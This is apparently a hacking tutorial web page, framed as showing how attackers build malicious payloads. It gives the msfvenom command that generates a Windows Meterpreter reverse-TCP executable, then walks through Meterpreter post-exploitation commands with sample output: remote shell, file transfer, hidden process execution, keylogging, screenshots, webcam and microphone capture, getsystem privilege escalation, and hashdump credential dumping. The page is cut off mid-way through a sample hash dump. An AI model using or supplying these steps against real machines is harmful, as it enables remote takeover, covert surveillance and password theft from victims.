Settings
Log out
All the application we are using in windows are not at all completely safe. Sometimes the application (EXE file) that we using for openning or installing might combined with some malicious payloads.
Once the malicious payload is installed in our computer, our system will be be compromised and the hacker can gain access to our system in a matter of time.
Here, in this session we are going to see, how hackers create malicious payloads with Metasploit and meterpreter/reverse_tcp.
windows/meterpreter/reverse_tcp is typically used in two different ways.
First, it is typically used as a payload for an exploit. Here's how to do that:
In msfconsole, select an exploit module Configure the options for that exploit. Do: set payload windows/meterpreter/reverse_tcp Set the LHOST option, which is the IP that the payload should connect to. Do: exploit. If the exploit is successful, it should execute that payload.
Another way to use windows/meterpreter/reverse_tcp is to generate it as an executable. Normally, you would want to do it with msfvenom. If you are old school, you have probably also heard of msfpayload and msfencode.
msfvenom is a replacement of those.
The following is a basic example of using msfvenom to generate windows/meterpreter/reverse_tcp as an executable:
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f exe -o /tmp/payload.exe
Important Basic Commands
pwd command
The pwd command allows you to see the current directory you're in on the remote target. Example:
meterpreter > pwd C:\Users\user\Desktop
cd command
The cd command allows you to change directories. Example:
meterpreter > cd C:\\ meterpreter > pwd C:\
cat command
The cat command allows you to see the content of a file:
meterpreter > cat C:\\file.txt Hello world!
upload command
The upload command allows you to upload a file to the remote target. For example:
meterpreter > upload /tmp/something.txt C:\\Users\\user\\Desktop\\something.txt [*] uploading : /tmp/something.txt -> C:\Users\user\Desktop\something.txt [*] uploaded : /tmp/something.txt -> C:\Users\user\Desktop\something.txt meterpreter >
The -r option for the command also allows you to upload recursively.
download command
The download command allows you download a file from the remote target to your machine. For example:
meterpreter > download C:\\Users\\user\\Desktop\\something.txt /tmp/ [*] downloading: C:\Users\user\Desktop\something.txt -> /tmp//something.txt [*] download : C:\Users\user\Desktop\something.txt -> /tmp//something.txt meterpreter >
The -r option for the command also allows you to download recursively.
search command
The search command allows you to find files on the remote file system. For example, this demonstrates how to find all text files in the current directory:
meterpreter > search -d . -f *.txt Found 1 result... .\something.txt (5 bytes)
Note that without the -d option, the command will attempt to search in all drives.
The -r option for the commands allows you to search recursively.
ifconfig command
The ifconfig command displays the network interfaces on the remote machine:
meterpreter > ifconfig Interface 1 ============ Name : Software Loopback Interface 1 Hardware MAC : 00:00:00:00:00:00 MTU : 4294967295 IPv4 Address : 127.0.0.1 IPv4 Netmask : 255.0.0.0 IPv6 Address : ::1 IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff ...
The command ipconfig is an alias for ifconfig.
getuid command
The getuid command shows you the current user that the payload is running as:
meterpreter > getuid Server username: WIN-6NH0Q8CJQVM\user
execute command
The execute command allows you to execute a command or file on the remote machine.
The following example will spawn a calculator:
meterpreter > execute -f calc.exe Process 2076 created.
To pass an argument, use the -a flag:
meterpreter > execute -f iexplore.exe -a https://metasploit.com Process 2016 created.
There are some options you can see to add more stealth. For example, you can use the -H flag to create the process hidden from view. You can also use the -m flag to execute from memory.
ps command
The ps command lists the running processes on the remote machine.
shell command
The shell command allows you to interact with the remote machine's command prompt. Example:
meterpreter > shell Process 3576 created. Channel 6 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\user\Desktop>
To switch back to Meterpreter, do [CTRL]+[Z] to background the channel.
sysinfo command
The sysinfo command shows you basic information about the remote machine. Example:
meterpreter > sysinfo Computer : WIN-6NH0Q8CJQVM OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/win32 meterpreter >
keyscan_start
The keyscan_start command starts the keylogging feature on the remote machine.
keyscan_dump
The keyscan_dump command is a keylogger feature. You must use the keyscan_start command before using this. Example:
meterpreter > keyscan_start Starting the keystroke sniffer... meterpreter > keyscan_dump Dumping captured keystrokes... Hello World!!
If you wish to stop sniffing, use the keyscan_stop command.
keyscan_stop
The keyscan_stop command stops the keylogger.
screenshot
The screenshot command takes a screenshot of the target machine.
webcam_list
The webcam_list commands shows you a list of webcams that you can control. You'll probably want to use this first before using any other webcam commands.
webcam_snap
The webcam_snap commands uses the selected webcam to take a picture.
webcam_stream
The webcam_stream command basically uses the webcam_snap command repeatedly to create the streaming effect. There is no sound.
record_mic
The record_mic command captures audio on the remote machine.
getsystem
The getsystem command attempts to elevate your privilege on the remote machine with one of these techniques:
Named pipe impersonation (in memory) Named pipe impersonation (dropper) Token duplication (in memory)
Example:
meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
hashdump
The hashdump commands allows you to dump the Windows hashes if there are the right privileges. For example:
meterpreter > hashdump Administrator:500:e39baff0f2c5fd4e93e28745b8bf4ba6:f4974ee4a935ee160a927eafbb3f317f::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:92a84e332fa4b09e9850257ad6826566:8fb9a6e155fd6e14a16c37427b68bbb4::: root:1003:633c097a37b26c0caad3b435b51404ee:f2477a144dff4f216ab81f2ac3e3207d::: SUPPORT_388945a0:1002:aad